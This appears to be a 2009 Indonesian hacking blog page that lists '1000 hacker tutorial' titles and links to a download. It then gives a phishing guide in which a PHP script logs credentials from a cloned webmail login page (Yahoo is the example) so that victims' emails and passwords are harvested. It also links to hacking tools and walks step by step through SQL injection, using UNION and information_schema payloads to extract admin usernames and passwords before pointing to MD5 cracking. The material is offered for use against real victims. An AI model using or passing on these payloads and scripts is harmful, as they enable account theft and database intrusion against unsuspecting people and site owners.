Situs masih update

Terima Kasih atas kunjungannya!!silahkan tinggalkan komentar....

Situs masih update

Terima Kasih atas kunjungannya!!silahkan tinggalkan komentar....

Situs masih update

Terima Kasih atas kunjungannya!!silahkan tinggalkan komentar....

Situs masih update

Terima Kasih atas kunjungannya!!silahkan tinggalkan komentar....

Situs masih update

Terima Kasih atas kunjungannya!!silahkan tinggalkan komentar....

Jumat, 09 Januari 2009

1000 hacker tutorial

Create Bootable XP SP integrated CD
Create One-click Shutdown And Reboot Shortcuts
Creating a Board aka Forum on your own PC !
Creating Universal Ghost Usb Boot Disk And Cd
Data Capacity of CDs [Tutorial]
Delete An undeletable File
Delete Files From The Recent File List In Windows
Digital Camera Guide
Digital Faq-learn Everything About Digital Capture, Edit and Burning and more
Digital Photo Id Cards, Greate Info
Direct Link To Any Page You Want To In Hotmail
Directx Explained
Disable Compression On Xp, NTFS partition, Disk Cleanup
Disable The Send Error Report, to Microsoft
Disable Windows Logo Key
Discover New Music You'll Probably Love
Download Free Music legally, legally
Download from a paypal site without paying a penny
Download From Ftpz, Using Ftp Search Sitez
Download Mp3's Without Using Filesharing
Download Music And Video With Media Player 9, quick and easy!
Download Timeframes
Dual Boot After The Fact
Dvd Copying-ripping Definitions
DVD Regions Information
Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies
Easily Disconnect-reconnect From Broadband
Easily Find Serial Numbers On Google.., easy to do and works like a charm
Ebay Hacktip
General Keyboard Shortcuts
Get In Windows 2000 As Administrator
Get the Most Out of Your DVD Recorder
Get The Music You Want To Hear
Get unlimited bandwidth from your host for free
Getting A 1gb Yahoo China Account
Getting Counter-strike Source To Work
getting movies, mp3,games using google
Getting older programs to run on Windows XP
Getting started with Linux for noobs!
Go to Windows updates anonymously
Google Search
Google secrets
Google Tips & Tricks, (utilizing search engine)
Graffiti On Walls 4 Adobe Photoshop Cs 8.0
Guide For Getting Free Stuff
Guide to IIS Exploitation
Guide to Slipstreaming Service Pack 2
Hard drive Gone Bad
Hardware Firewall


silahkan download di link ini :

http://rapidshare.com/files/136669387/1000_Hacker_Tutorials_2008.rar

atau dibawah ini :

http://rs54.rapidshare.com/files/157460331/1000_Hacker_Tutorials_2008.rar

hacking mail

pertama pilih dulu webmmail yang mau dijadikan bahan,misalnya saja yahoo!!

simple code dibawah ini copy dan paste di notepad anda dan simpan dengan format .php lalu upload

header("Location: URL 4 REDIRECT ");
$handle = fopen("hasil.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Setelah itu ambil source webmail target anda.. cari dan rubah kode di kolom 1 ini menjadi seperti di kolom 2 sebelum anda merippingnya ke hostingan anda..



1.



2.


hanya mengganti method="post" dengan "get" dan buat action tujukan ke file php
dan buat

header("Location: URL 4 REDIRECT ");

adalah tempat dimana anda meredirek victim setelah login..

langkah terakhir upload sebuah txt file beri nama hasil.txt untuk melihat hasil log email dan passwordnya..

jika berhasil mendapat email beserta password nya jangan lupa bagi ya??



tool hacking

Untuk yang mau download tool hacking bisa download disini :

http://www.leetupload.com/dbindex2/index.php?dir=Win32/

SQL INJECTION

Untuk mencari ada atau tidak bugnya sebenernya dah banyak tutorialnya,juga standar pencarian union,tp gpp deh,mungin tutorial ne bisa bermanfaat bagi yg blm tau.

1.) Cek Kutu

Misalkan kita mendapatkan target

http://www.target.com/news.php?id=5

Sekarang kita test ada kutunya g tuh website dengan menambahkan di url’

contoh http://www.target.com/news.php?id=5

maka akan muncul error

“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”

Atau Yang mendekati

Itu berarti kita bisa gunakan Sql Injection

2). Mencari nomor dari kolom

Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY

Kita melakukan perurutan nomor sampai ada error

http://www.target.com/news.php?id=5+order+by+1/* <– no error

http://www.target.com/news.php?id=5+order+by+2/* <– no error

http://www.target.com/news.php?id=5+order+by+3/* <– no error

http://www.target.com/news.php?id=5+order+by+4/* <– error (kita akan mendapatkan pesan seperti Unknown column ‘4′ in ‘order clause’ atau sesuatu seperti itu…ya gitu degh Sad )

Berarti kita mendapatkan kolomnya, ya itu 3, karena di 4 error.

Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.

3). Menggunakan fungsi UNION

Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.

Jadi kita mendapatkan

http://www.target.com/news.php?id=5+UNION+SELECT+1,2,3/* (kita telah menemukan bahwa nomor dari kolom-kolom adalah 3 di dalam bagian 2)

Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION

4). Check versi dari MySQL

http://www.target.com/news.php?id=5+union+select+1,2,3/*

NOTE: jika /* tidak bisa atau terjadi error, coba dengan –

ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.

Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya

kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.

Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*

Jika kamu mendapatkan error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”

Yang kita butuhkan adalah fungsi convert()

contoh :

http://www.target.com/news.php?id=5+union+select+1,convert(@@version+using+latin1),3/*

atau dengan hex() dan unhex()

contoh :

http://www.target.com/news.php?id=5+union+all+select+1,unhex(hex(@@version)),3/*

dan kamu akan mendapatan versi MySql Very Happy

5). Mendapatkan table dan nama column

Jika versi MySQL adalah 5 (contoh : 5.0.45, 5.0.51a-community…)

– Mencari Table

Contoh Nomor yang keluar ada 2, jadi kita masukan perintah injekan di nomor 2

http://www.target.com/news.php?id=5+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=database()+limit+0,1/*

Untuk melihat table selanjutnya kita rubah limit+0,1/* menjadi limit+1,1/* lalu limit+2,1/* dst.

Sampai tabel yang dinginkan, contoh table admin

– Mencari Column

Sekarang kita cari column pada table admin

http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=’admin’+limit+0,1/*

Setandarnya bisa menggunakan itu jika quotenya off, tetapi jika quote on nama table harus di encode dengan hexa

admin = 61646D696E

Untuk dapat di baca oleh perintah SQL, harus di tambahakan 0x sihingga menjadi 0×61646D696E

http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0×61646D696E+limit+0,1/*

Untuk melihat colum selanjutnya tinggal merubah limitnya seperti table diatas.

Contoh column yang keluar username dan password

Sekarang kita lihat datanya.

http://www.target.com/news.php?id=5+union+select+1,username,3+from+admin/*

Contoh data yang keluar : admin

http://www.target.com/news.php?id=5+union+select+1,password,3+from+admin/*

Contoh data yang keluar : p45w0rd

sekarang kita harus menyelesaikan query biar terlihat bagus Smile

untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)

contoh :

http://www.target.com/news.php?id=5+union+all+select+1,concat(username,0×3a,password),3+from+admin/*

catatan : 0×3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL

(ada cara lain untuk itu dengan menggunakan, char(5Cool, merupakan dari nilai decimal )

http://www.target.com/news.php?id=5+union+all+select+1,concat(username,char(5Cool,password),3+from+admin/*

Maka akan muncul tampilan data : admin:p45w0rd

nah dah dapet deh username admin ma passwordnya,tp kebanyakan password di enkrisi menggunakan MD5,jadi jika ingin tau passwornya kita kudu dekrip dlu password yang dah d enkrisi tadi,caranya dah banyak koq d google,tinggal cari aj d google make keyword "MD5 cracking".

Twitter Delicious Facebook Digg Stumbleupon Favorites More